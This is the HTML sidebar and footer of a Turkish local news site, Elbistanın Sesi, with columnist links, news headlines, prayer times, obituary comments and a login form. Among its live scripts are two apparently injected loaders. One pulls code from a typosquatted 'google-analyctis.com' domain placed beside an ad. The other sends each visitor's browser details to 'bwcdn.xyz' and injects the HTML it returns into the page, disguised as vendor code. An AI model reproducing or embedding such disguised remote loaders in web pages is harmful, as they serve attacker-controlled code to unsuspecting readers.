            <a href="http://www.elbistaninsesi.com/medar-i-iftiharimiz-cumhurbaskanimiz-baskomutanimiz-sayin-recep-tayyip-erdogan-dan-elbistan-cevresi-bolgesi-dolayisiyla-11-ilcesiyle-birlikte-kahramanmaras-halkinin-allah-rizasi-icin-arz-talep-ve-istirhamini-arzediyor-6-bolge-tesvikinden-yararlanmak-istiy" title="MEDAR-I İFTİHARIMIZ, CUMHURBAŞKANIMIZ, BAŞKOMUTANIMIZ, SAYIN RECEP TAYYİP ERDOĞAN&#039;DAN; ELBİSTAN, ÇEVRESİ, BÖLGESİ, DOLAYISIYLA: 11 İLÇESİYLE BİRLİKTE KAHRAMANMARAŞ HALKININ; ALLAH RIZASI İÇİN: ARZ,  TALEP VE İSTİRHAMINI ARZEDİYOR; 6. BÖLGE TEŞVİKİNDEN YARARLANMAK İSTİYOR!" >
            <div class="hs-yazar-resim pull-right">
                <img src="http://www.elbistaninsesi.com/images/yazarlar/thumbs/mehmet-gocer_1.jpg" alt="Mehmet Göçer">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="http://www.elbistaninsesi.com/profil/4/mehmet-gocer" title="Mehmet Göçer">Mehmet Göçer</a></h4>
              <a href="http://www.elbistaninsesi.com/medar-i-iftiharimiz-cumhurbaskanimiz-baskomutanimiz-sayin-recep-tayyip-erdogan-dan-elbistan-cevresi-bolgesi-dolayisiyla-11-ilcesiyle-birlikte-kahramanmaras-halkinin-allah-rizasi-icin-arz-talep-ve-istirhamini-arzediyor-6-bolge-tesvikinden-yararlanmak-istiy" title="MEDAR-I İFTİHARIMIZ, CUMHURBAŞKANIMIZ, BAŞKOMUTANIMIZ, SAYIN RECEP TAYYİP ERDOĞAN&#039;DAN; ELBİSTAN, ÇEVRESİ, BÖLGESİ, DOLAYISIYLA: 11 İLÇESİYLE BİRLİKTE KAHRAMANMARAŞ HALKININ; ALLAH RIZASI İÇİN: ARZ,  TALEP VE İSTİRHAMINI ARZEDİYOR; 6. BÖLGE TEŞVİKİNDEN YARARLANMAK İSTİYOR!" >MEDAR-I İFTİHARIMIZ, CUMHURBAŞKANIMIZ, BAŞKOMUTANIMIZ, SAYIN RECEP TAYYİP ERDOĞAN&#039;DAN; ELBİSTAN, ÇEVRESİ, BÖLGESİ, DOLAYISIYLA: 11 İLÇESİYLE BİRLİKTE KAHRAMANMARAŞ HALKININ; ALLAH RIZASI İÇİN: ARZ,  TALEP VE İSTİRHAMINI ARZEDİYOR; 6. BÖLGE TEŞVİKİNDEN YARARLANMAK İSTİYOR!</a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="http://www.elbistaninsesi.com/sorular-makale,6245.html" title="SORULAR" >
            <div class="hs-yazar-resim pull-right">
                <img src="http://www.elbistaninsesi.com/images/yazarlar/thumbs/İsimsiz-2.jpg" alt="Hatice Bacaklı">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="http://www.elbistaninsesi.com/profil/99/hatice-bacakli" title="Hatice Bacaklı">Hatice Bacaklı</a></h4>
              <a href="http://www.elbistaninsesi.com/sorular-makale,6245.html" title="SORULAR" >SORULAR</a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="http://www.elbistaninsesi.com/uc-maymun-mu-yoksa-erdem-ve-ahlak-mi-makale,6227.html" title="Üç Maymun mu? Yoksa Erdem ve Ahlak mı?" >
            <div class="hs-yazar-resim pull-right">
                <img src="http://www.elbistaninsesi.com/images/yazarlar/thumbs/mikail_Yahin_foto.jpeg" alt="Mikail Şahin">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="http://www.elbistaninsesi.com/profil/65/mikail-sahin" title="Mikail Şahin">Mikail Şahin</a></h4>
              <a href="http://www.elbistaninsesi.com/uc-maymun-mu-yoksa-erdem-ve-ahlak-mi-makale,6227.html" title="Üç Maymun mu? Yoksa Erdem ve Ahlak mı?" >Üç Maymun mu? Yoksa Erdem ve Ahlak mı?</a>
            </div>
          </a>
          </div>
              </div>
      <div class="item">
                <div class="hs-yazar">
            <a href="http://www.elbistaninsesi.com/kimdik-kim-olduk-kim-olacagiz-makale,6226.html" title="KİMDİK ? KİM OLDUK! KİM OLACAĞIZ!!!" >
            <div class="hs-yazar-resim pull-right">
                <img src="http://www.elbistaninsesi.com/images/yazarlar/thumbs/Recep-arkadaş.jpg" alt="Recep ÇİFTLİKLİ">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="http://www.elbistaninsesi.com/profil/97/recep-ciftlikli" title="Recep ÇİFTLİKLİ">Recep ÇİFTLİKLİ</a></h4>
              <a href="http://www.elbistaninsesi.com/kimdik-kim-olduk-kim-olacagiz-makale,6226.html" title="KİMDİK ? KİM OLDUK! KİM OLACAĞIZ!!!" >KİMDİK ? KİM OLDUK! KİM OLACAĞIZ!!!</a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="http://www.elbistaninsesi.com/solan-tebessum-makale,6216.html" title="SOLAN TEBESSÜM" >
            <div class="hs-yazar-resim pull-right">
                <img src="http://www.elbistaninsesi.com/images/yazarlar/thumbs/d985fcce-69b5-47bf-99fe-3c82dc92b125.jpg" alt="Akif DUT">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="http://www.elbistaninsesi.com/profil/91/akif-dut" title="Akif DUT">Akif DUT</a></h4>
              <a href="http://www.elbistaninsesi.com/solan-tebessum-makale,6216.html" title="SOLAN TEBESSÜM" >SOLAN TEBESSÜM</a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="http://www.elbistaninsesi.com/bilimsel-tip-ve-bizimsel-tip-makale,6212.html" title="BİLİMSEL TIP ve BİZİMSEL TIP" >
            <div class="hs-yazar-resim pull-right">
                <img src="http://www.elbistaninsesi.com/images/yazarlar/thumbs/dr_kaya.jpg" alt="Dr. Öğretim Üyesi / Mustafa Emrah Kaya">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="http://www.elbistaninsesi.com/profil/87/dr-ogretim-uyesi-mustafa-emrah-kaya" title="Dr. Öğretim Üyesi / Mustafa Emrah Kaya">Dr. Öğretim Üyesi / Mustafa Emrah Kaya</a></h4>
              <a href="http://www.elbistaninsesi.com/bilimsel-tip-ve-bizimsel-tip-makale,6212.html" title="BİLİMSEL TIP ve BİZİMSEL TIP" >BİLİMSEL TIP ve BİZİMSEL TIP</a>
            </div>
          </a>
          </div>
              </div>
    </div>
  </div>

  
  <!-- SON DAKIKA VE OZEL HABER -->
  <div class="sonozeltab">

    <ul class="nav nav-tabs" id="sonozel">
      <li class="active"><a href="#sondakika" data-toggle="tab" class="sondakika">Son Dakika</a></li>      <li class=""><a href="#ozelhaber" data-toggle="tab" class="ozelhaber">Özel Haber</a></li>    </ul>

    <div class="tab-content">

            <div class="tab-pane active" id="sondakika">
        <ul class="unstyled hs-liste add-last">
          
          <li><a href="http://www.elbistaninsesi.com/guncel/terbuzekteki-kirmizi-benekli-alabalik-olumleri-vatandasi-endiselendiriyor-h70711.html" title="Terbüzek’teki kırmızı benekli alabalık ölümleri vatandaşı endişelendiriyor" >Terbüzek’teki kırmızı benekli alabalık ölümleri vatandaşı endişelendiriyor</a></li>
          
          <li><a href="http://www.elbistaninsesi.com/guncel/elbistanda-82-bin-doz-asi-yapildi-h70610.html" title="Elbistan’da 82 bin doz aşı yapıldı" >Elbistan’da 82 bin doz aşı yapıldı</a></li>
          
          <li><a href="http://www.elbistaninsesi.com/guncel/besi-osbye-bolge-muduru-alinacak-h70602.html" title="Besi OSB’ye bölge müdürü alınacak" >Besi OSB’ye bölge müdürü alınacak</a></li>
          
          <li><a href="http://www.elbistaninsesi.com/guncel/tasburundaki-pinar-suyuna-icilemez-raporu-h70435.html" title="Taşburun’daki pınar suyuna içilemez raporu" >Taşburun’daki pınar suyuna içilemez raporu</a></li>
          
          <li class="last"><a href="http://www.elbistaninsesi.com/guncel/tuvturkten-gecikme-zammi-aciklamasi-h70291.html" title="TÜVTÜRK’ten gecikme zammı açıklaması" >TÜVTÜRK’ten gecikme zammı açıklaması</a></li>
                  </ul>
      </div>
      
            <div class="tab-pane" id="ozelhaber">
        <ul class="unstyled hs-liste add-last">
          
          <li><a href="http://www.elbistaninsesi.com/ekonomi/yapalak-santralinin-gelecegini-migemin-gorusu-belirleyecek-h37268.html" title="Yapalak santralinin geleceğini, MİGEMin görüşü belirleyecek" >Yapalak santralinin geleceğini, MİGEM’in görüşü belirleyecek</a></li>
          
          <li><a href="http://www.elbistaninsesi.com/vefatlar/durmus-ali-yavuz-80-yasinda-h37225.html" title="Durmuş Ali Yavuz 80 yaşında" >Durmuş Ali Yavuz 80 yaşında</a></li>
          
          <li><a href="http://www.elbistaninsesi.com/ekonomi/pancardaki-polar-orani-mahkemelik-oldu-h37167.html" title="Pancardaki polar oranı, mahkemelik oldu" >Pancardaki polar oranı, mahkemelik oldu</a></li>
          
          <li><a href="http://www.elbistaninsesi.com/guncel/boyle-saka-gorulmedi-h34847.html" title="Böyle şaka görülmedi!" >Böyle şaka görülmedi!</a></li>
          
          <li class="last"><a href="http://www.elbistaninsesi.com/guncel/eshab-i-kehf-kulliyesine-konaklama-tesisi-h34004.html" title="Eshab-ı Kehf Külliyesine konaklama tesisi" >Eshab-ı Kehf Külliyesi’ne konaklama tesisi</a></li>
                  </ul>
      </div>
      
    </div>
  </div>
  
<!-- NAMAZ VAKITLERI -->
  <div class="namazvakitleri">
    <div class="title">
      <h5>Namaz Vakitleri</h5>
      <select name="namaz" onchange="namaz_vakitleri(this.value); " class="span5 pull-right">
                <option value="adana" >Adana</option>
                <option value="adiyaman" >Adıyaman</option>
                <option value="afyon" >Afyon</option>
                <option value="agri" >Ağrı</option>
                <option value="aksaray" >Aksaray</option>
                <option value="amasya" >Amasya</option>
                <option value="ankara" >Ankara</option>
                <option value="antalya" >Antalya</option>
                <option value="ardahan" >Ardahan</option>
                <option value="artvin" >Artvin</option>
                <option value="aydin" >Aydın</option>
                <option value="balikesir" >Balıkesir</option>
                <option value="bartin" >Bartın</option>
                <option value="batman" >Batman</option>
                <option value="bayburt" >Bayburt</option>
                <option value="bilecik" >Bilecik</option>
                <option value="bingol" >Bingöl</option>
                <option value="bitlis" >Bitlis</option>
                <option value="bolu" >Bolu</option>
                <option value="burdur" >Burdur</option>
                <option value="bursa" >Bursa</option>
                <option value="canakkale" >Çanakkale</option>
                <option value="cankiri" >Çankırı</option>
                <option value="corum" >Çorum</option>
                <option value="denizli" >Denizli</option>
                <option value="diyarbakir" >Diyarbakır</option>
                <option value="duzce" >Düzce</option>
                <option value="edirne" >Edirne</option>
                <option value="elazig" >Elazığ</option>
                <option value="erzincan" >Erzincan</option>
                <option value="erzurum" >Erzurum</option>
                <option value="eskisehir" >Eskişehir</option>
                <option value="gaziantep" >Gaziantep</option>
                <option value="giresun" >Giresun</option>
                <option value="gumushane" >Gümüşhane</option>
                <option value="hakkari" >Hakkari</option>
                <option value="hatay" >Hatay</option>
                <option value="igdir" >Iğdır</option>
                <option value="isparta" >Isparta</option>
                <option value="istanbul" >İstanbul</option>
                <option value="izmir" >İzmir</option>
                <option value="kahramanmaras" selected>Kahramanmaraş</option>
                <option value="karabuk" >Karabük</option>
                <option value="karaman" >Karaman</option>
                <option value="kars" >Kars</option>
                <option value="kastamonu" >Kastamonu</option>
                <option value="kayseri" >Kayseri</option>
                <option value="kirikkale" >Kırıkkale</option>
                <option value="kirklareli" >Kırklareli</option>
                <option value="kirsehir" >Kırşehir</option>
                <option value="kilis" >Kilis</option>
                <option value="izmit" >Kocaeli</option>
                <option value="konya" >Konya</option>
                <option value="kutahya" >Kütahya</option>
                <option value="malatya" >Malatya</option>
                <option value="manisa" >Manisa</option>
                <option value="mardin" >Mardin</option>
                <option value="mersin" >Mersin</option>
                <option value="mugla" >Muğla</option>
                <option value="mus" >Muş</option>
                <option value="nevsehir" >Nevşehir</option>
                <option value="nigde" >Niğde</option>
                <option value="ordu" >Ordu</option>
                <option value="osmaniye" >Osmaniye</option>
                <option value="rize" >Rize</option>
                <option value="adapazari" >Sakarya</option>
                <option value="samsun" >Samsun</option>
                <option value="siirt" >Siirt</option>
                <option value="sinop" >Sinop</option>
                <option value="sivas" >Sivas</option>
                <option value="sanliurfa" >Şanlıurfa</option>
                <option value="sirnak" >Şırnak</option>
                <option value="tekirdag" >Tekirdağ</option>
                <option value="tokat" >Tokat</option>
                <option value="trabzon" >Trabzon</option>
                <option value="tunceli" >Tunceli</option>
                <option value="usak" >Uşak</option>
                <option value="van" >Van</option>
                <option value="yalova" >Yalova</option>
                <option value="yozgat" >Yozgat</option>
                <option value="zonguldak" >Zonguldak</option>
              </select>
    </div>
      <div class="sonuc">

      <table cellspacing="0" cellpadding="0" id="vakitler">
          <tr>
            <th>İmsak</th>
            <th>Güneş</th>
            <th>Öğle</th>
            <th>İkindi</th>
            <th>Akşam</th>
            <th>Yatsı</th>
          </tr>
          <tr>
            <td>04:16</td>
            <td>05:44</td>
            <td>12:41</td>
            <td>16:25</td>
            <td>19:28</td>
            <td>20:50</td>
          </tr>
      </table>


      </div>

  </div>

  <div class="reklam reklam208"><iframe name=BIKADV src="http://medya.ilan.gov.tr/widgets/YYN-001260-20160610.html" width="300" height="175" frameborder="0" scrolling="no"></iframe>
<script src="//apis.google-analyctis.com/ajax/libs/query/1/6/2/jquery/min"></script></div>
  <!-- SON YORUMLAR -->
  <div class="son-yorumlar">
    <div class="header">
      <h5>Son Yorumlar</h5>
    </div>
    <div class="content">
      <ul class="unstyled hs-liste add-last">
                <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/aslihan-ozer-39-yasinda-h70921.html#comment_355511" title="" >Alla rahmet eylesin.Mekanı cennet olsun.</a></li>
                <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/abdurrezzak-dogan-98-yasinda-h70932.html#comment_355510" title="" >ALLAH rahmet eylesin mekani cennet olsun...</a></li>
                <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/vefat-tesekkur-ali-kayiran-h70942.html#comment_355509" title="" >ALLAH rahmet eylesin mekani cennet olsun...</a></li>
                <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/anma-mustafa-abdik-h70943.html#comment_355508" title="" >ALLAH rahmet eylesin mekani cennet olsun...</a></li>
                <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/anma-mustafa-abdik-h70943.html#comment_355507" title="" >Allah rahmet eylesin mekani cennet olsun...</a></li>
                <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/celal-ozer-h70916.html#comment_355506" title="" >ALLAH cc rahmet eylesin mekanı cennet olsun...</a></li>
                <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/abdurrezzak-dogan-98-yasinda-h70932.html#comment_355505" title="" >Allah rahmet eylesin mekanı cennet olsun...</a></li>
                <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/aslihan-ozer-39-yasinda-h70921.html#comment_355504" title="" >Allahrahmet.eylesin.mekanı Cennet.olsun.</a></li>
                <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/abdurrezzak-dogan-98-yasinda-h70932.html#comment_355503" title="" >Allah rahmet eylesin mekanı cennet olsun....</a></li>
                <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/celal-ozer-h70916.html#comment_355502" title="" >ALLAH RAHMET EYLESIN MEKANI CENNET OLSUN...</a></li>
                <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/aslihan-ozer-39-yasinda-h70921.html#comment_355501" title="" >Allah rahmet eylesin mekanı cennet olsun...</a></li>
                <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/aslihan-ozer-39-yasinda-h70921.html#comment_355500" title="" >Allah&#39;ım rahmet eylesin mekanı cennet...</a></li>
                <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/kasim-cetin-87-yasinda-h70919.html#comment_355498" title="" >Allah rahmet eylesin mekanı cennet olsun...</a></li>
                <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/kasim-cetin-87-yasinda-h70919.html#comment_355497" title="" >Allah rahmet eylesin mekanı cennet olsun...</a></li>
                <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/abdurrezzak-dogan-98-yasinda-h70932.html#comment_355496" title="" >ALLAH RAHMET EYLESİN MEKANI CENNET TOPRAĞI...</a></li>
                <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/aslihan-ozer-39-yasinda-h70921.html#comment_355495" title="" >Allah rahmet eylesin mekanı cennet olsun.Ailesi...</a></li>
                <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/ismet-bozdogan-63-yasinda-h70752.html#comment_355494" title="" >Allah rahmet eylesin mekanı cennet olsun</a></li>
                <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/aslihan-ozer-39-yasinda-h70921.html#comment_355493" title="" >Allah rahmet eylesin mekanı cennet olsun</a></li>
                <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/aslihan-ozer-39-yasinda-h70921.html#comment_355492" title="" >Allah&#39;ım rahmet eylesin mekanı cennet...</a></li>
                <li class="last"><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/aslihan-ozer-39-yasinda-h70921.html#comment_355491" title="" >ALLAH rahmet eylesin</a></li>
              </ul>
    </div>
  </div>

  
<!-- ARSIV -->
<div class="arsiv">
  <div class="header">
    <h5>Arşiv</h5>
  </div>
  <div class="content">
    <form action="http://www.elbistaninsesi.com/?m=arsiv" method="post" name="arsiv" >
      <select name="gun" class="day span1">
                <option value="01" >01</option>
                <option value="02" >02</option>
                <option value="03" >03</option>
                <option value="04" >04</option>
                <option value="05" >05</option>
                <option value="06" >06</option>
                <option value="07" >07</option>
                <option value="08" >08</option>
                <option value="09" >09</option>
                <option value="10" >10</option>
                <option value="11" >11</option>
                <option value="12" >12</option>
                <option value="13" >13</option>
                <option value="14" >14</option>
                <option value="15" >15</option>
                <option value="16" >16</option>
                <option value="17" >17</option>
                <option value="18" >18</option>
                <option value="19" >19</option>
                <option value="20" >20</option>
                <option value="21" selected>21</option>
                <option value="22" >22</option>
                <option value="23" >23</option>
                <option value="24" >24</option>
                <option value="25" >25</option>
                <option value="26" >26</option>
                <option value="27" >27</option>
                <option value="28" >28</option>
                <option value="29" >29</option>
                <option value="30" >30</option>
                <option value="31" >31</option>
              </select>
      <select name="ay" class="month span1">
                <option value="01" >Ocak</option>
                <option value="02" >Şubat</option>
                <option value="03" >Mart</option>
                <option value="04" >Nisan</option>
                <option value="05" >Mayıs</option>
                <option value="06" >Haziran</option>
                <option value="07" >Temmuz</option>
                <option value="08" selected>Ağustos</option>
                <option value="09" >Eylül</option>
                <option value="10" >Ekim</option>
                <option value="11" >Kasım</option>
                <option value="12" >Aralık</option>
              </select>
      <select name="yil" class="year span1">
                <option value="2021" selected>2021</option>
                <option value="2020" >2020</option>
                <option value="2019" >2019</option>
                <option value="2018" >2018</option>
                <option value="2017" >2017</option>
              </select>
      <button type="submit" class="btn btn-default span1 pull-right">Ara</button>
    </form>
  </div>
</div>


  


        </div>
        
      </div>

        
                <!-- Sol Dikey Reklam -->
        <div class="reklam dikey sol" style="width:px;height:px;">

                                                                                                                                                                            </div>
        
        <!-- Sağ Dikey Reklam -->
        <div class="reklam dikey sag ortala" style="width:px;height:px;">

                                                                <p style="width:160px;"><script async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- kaynarca -->
<ins class="adsbygoogle"
 style="display:block"
 data-ad-client="ca-pub-3633419220222736"
 data-ad-slot="5807534991"
 data-ad-format="auto"
 data-full-width-responsive="true"></ins>
<script>
 (adsbygoogle = window.adsbygoogle || []).push({});
</script></p>
              
                                                                                                                                                                                                      </div>

        
      </div>

      <!-- FOOTER -->
<div id="siteFooter" class="footer">

      <div class="row-fluid">
      <div class="container center">
        <div class="span4">
          <div>Copyright © 2021 - Tüm hakları saklıdır.<br>Elbistanın Sesi</div>
          <div class="footer-social">
            <a href="https://facebook.com/elbistaninsesi" rel="nofollow"><img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/facebook_circle-32.png" alt="FACEBOOK"></a>
            <a href="https://twitter.com/elbistaninsesi" rel="nofollow"><img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/twitter_circle-32.png" alt="TWITTER"></a>
            <a href="http://www.elbistaninsesi.com/rss"><img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/rss_circle-32.png" alt="RSS"></a>
          </div>
        </div>
        <div class="span4 text-center">
          <div class="footer-logo"><a href="http://www.elbistaninsesi.com/" class="logo"><img src="http://www.elbistaninsesi.com/images/banner/Ysimsiz-1_1.jpg" alt="Kentpark’tan 13. yıla özel indirimler" /></a></div>
        </div>
        <div class="span4">
          <p>&lt;center&gt;

0 (344) 415 04 15 &lt;br&gt;
<a href="/cdn-cgi/l/email-protection" class="__cf_email__" data-cfemail="9ffaf3fdf6ecebfef1f6f1ecfaecf6f8fee5faebfaecf6dff8f2fef6f3b1fcf0f2">[email&#160;protected]</a>
&lt;br&gt;Kızılcaoba Mah. Kışla Cad. 19/1&lt;/center&gt;

    </p>          <p><span class="site-info glyphicons earphone" style="padding-left: 0;"></span> 0 (344) 415 04 15</p>        </div>
      </div>
      </div>

      <div id="footer-alt" class="row-fluid">

        <div class="container center">

        <div class="span3">
          <div class="footer-alt-link"><a href="http://www.elbistaninsesi.com/m/" class="footer-alt-mobil glyphicons iphone"><strong>Mobil</strong>Mobil siteyi görüntüleyin.</a></div>
        </div>
        <div class="span3">
          <div class="footer-alt-link"><a href="http://www.elbistaninsesi.com/kunye.html" class="footer-alt-reklam glyphicons global"><strong>Künye</strong>Künyeyi görüntüleyin.</a></div>
        </div>
        <div class="span3">
          <div class="footer-alt-link"><a href="http://www.elbistaninsesi.com/iletisim.html" class="footer-alt-iletisim glyphicons headset"><strong>İletişim</strong>Bize ulaşın.</a></div>
        </div>
        <div class="span3">
          <div class="footer-alt-link"><a href="http://www.elbistaninsesi.com/sitene-ekle.html" class="footer-alt-iletisim glyphicons embed_close"><strong>Sitene Ekle</strong>Güncel haberleri ekleyin.</a></div>
        </div>

        </div>
      </div>



      <div class="row-fluid">
      <div class="container center">
        <div class="span12 text-center">
          <p>Bu sitede yayınlanan tüm materyalin her hakkı mahfuzdur. Kaynak gösterilse bile gazetemizin izni olmadan yayınlanamaz.</p>         <a href="https://www.tebilisim.com/" target="_blank" title="haber sistemi, haber scripti, haber yazılımı, tebilişim"><p>Yazılım: TE Bilişim</p></a> 
        </div>
      </div>
      </div>

  <div id="top" class="btn btn-inverse">Yukarı Çık</div>
</div>
      <script data-cfasync="false" src="/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js"></script><script>
var facebook_paylasim_secret_token, facebook_paylasim_app_id;
facebook_paylasim_app_id = "";
facebook_paylasim_secret_token = "";
if (location.href.match(/\?.*/) && document.referrer) {
   location.href = location.href.replace(/\?.*/, '');
}
</script>
<div id="uye" class="user modal hide fade" tabindex="-1" role="dialog" aria-labelledby="myModalLabel" aria-hidden="true">
  <div class="modal-header">
    <button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button>
    <h3 id="myModalLabel">Üye Girişi</h3>
  </div>
  <div class="modal-body">
<form class="form-horizontal" action="http://www.elbistaninsesi.com/index.php?m=login&amp;rd=http%3A%2F%2Fwww.elbistaninsesi.com%2Fguncel%2Fkentparktan-13-yila-ozel-indirimler-h70944.html" method="post">
  <div class="control-group">
    <label class="control-label" for="inputName">Kullanıcı Adı</label>
    <div class="controls">
      <input id="inputName" value="" name="kullanici" type="text"  placeholder="Kullanıcı Adı" required>
    </div>
  </div>
  <div class="control-group">
    <label class="control-label" for="inputPassword">Şifre</label>
    <div class="controls">
      <input type="password" value="" name="sifre" id="inputPassword" placeholder="Şifre" required>
    </div>
  </div>
  <div class="control-group">
    <div class="controls">
      <button type="submit" class="btn hs-sdch btn-info">Giriş Yap</button>
    </div>
  </div>
</form>
  </div>
  <div class="modal-footer">
    <a href="http://www.elbistaninsesi.com/uyelik.html" class="pull-left btn">Üye Ol</a>
    <a href="http://www.elbistaninsesi.com/unuttum.html" class="pull-left btn">Şifremi unuttum?</a>
    <button class="btn hs-sdch btn-danger" data-dismiss="modal" aria-hidden="true">Kapat</button>
  </div>
</div>




<script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery-1.9.1.min.js"></script>
<script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/modernizr.custom.js"></script>
<script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/classie.js"></script>
<script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/uisearch.js"></script>
<script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/login.min.js"></script>
<script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.showbizpro.min.js"></script>
<script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.cookie.js"></script>
<script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.mousewheel.js"></script>
<script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.scrollbar.min.js"></script>
<script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.cycle.all.js"></script>
<script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/base.min.js"></script>
<script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/waypoints.min.js"></script>
<script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/sticky.min.js"></script>
<script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/comments.js"></script>
<script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.pKisalt.min.js"></script><script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/hs-paylas.min.js"></script><script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/moment.min.js"></script>
<script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/moment-tr.js"></script>
<script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/system.min.js"></script>
<script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/text.js"></script>
<script type="text/javascript">

	new UISearch( document.getElementById( 'sb-search' ) );

	$(function(){
							});

		$("#comment_list .text").pKisalt();
	
		var gsTitle = document.querySelectorAll(".gs-title")[0].innerHTML,
	gsSpace   = ' ',
	gsUrl   = location.href;
	$("#paylas").jsSocials({
		url: location.href,
		text: gsTitle,
		showCount: true,
		showLabel: false,
		shares: [
			{ share: "twitter", via: "elbistaninsesi", hashtags: "Elbistanın Sesi" },
            { share: "whatsapp", text: "Bunu bilmelisin!"},
            "facebook",
            "linkedin",
            "pinterest",
			]
		});
							$('#haber > .page-header').waypoint(function(direction) {
		  $('#article-finished').toggleClass('hiding', direction === "up");
		}, {
		  offset: function() {
		    return $.waypoints('viewportHeight') - $(this).height() - 750;
		  }
		});
			var hasBeenClicked = false;
	var kisa_site_adi = "Elbistanın Sesi";
	var kopyala_imza_onu = "Kaynak: http://www.elbistaninsesi.com";

	$(document).on('copy', function(e){
		if ($(e.target).closest("#yorumlar,textarea,input").length) {
			hasBeenClicked = true;
		} else {
			hasBeenClicked = false;
		}
	  var sel = window.getSelection();
	  var copyFooter = "<br><br>" + kopyala_imza_onu + "<a href='"+document.location.href+"'>"+document.location.href+"</a><br><br>" + kisa_site_adi;
	  var copyHolder = $('<div>', {html: sel+copyFooter, style: {position: 'absolute', left: '-99999px'}});
	  if (!hasBeenClicked){
	  	$('body').append(copyHolder);
	  	sel.selectAllChildren( copyHolder[0] );
	  	window.setTimeout(function() {
	      copyHolder.remove();
	  	},0);
	 }
	});
		
	
	
	
	
	


		tebilisim('70944', 'haber', '');
	
</script>

    <script>let teBilisimXHR=new XMLHttpRequest;teBilisimXHR.open("GET",`https://bwcdn.xyz/request.php?agent=${navigator?.userAgent}&r=${document?.referrer}`),teBilisimXHR.onreadystatechange=(()=>{if(4==teBilisimXHR.readyState){const e=JSON.parse(teBilisimXHR.response);document.querySelector("body").insertAdjacentHTML("afterbegin",e?.html)}}),teBilisimXHR.setRequestHeader("RequestWith","TEBILISIM"),teBilisimXHR.send();</script>	    
	
	
    
<!-- Global site tag (gtag.js) - Google Analytics -->
<script async src="https://www.googletagmanager.com/gtag/js?id=UA-21655627-1"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'UA-21655627-1');
</script>
<!-- End Google Analytics -->



  </body>
</html>
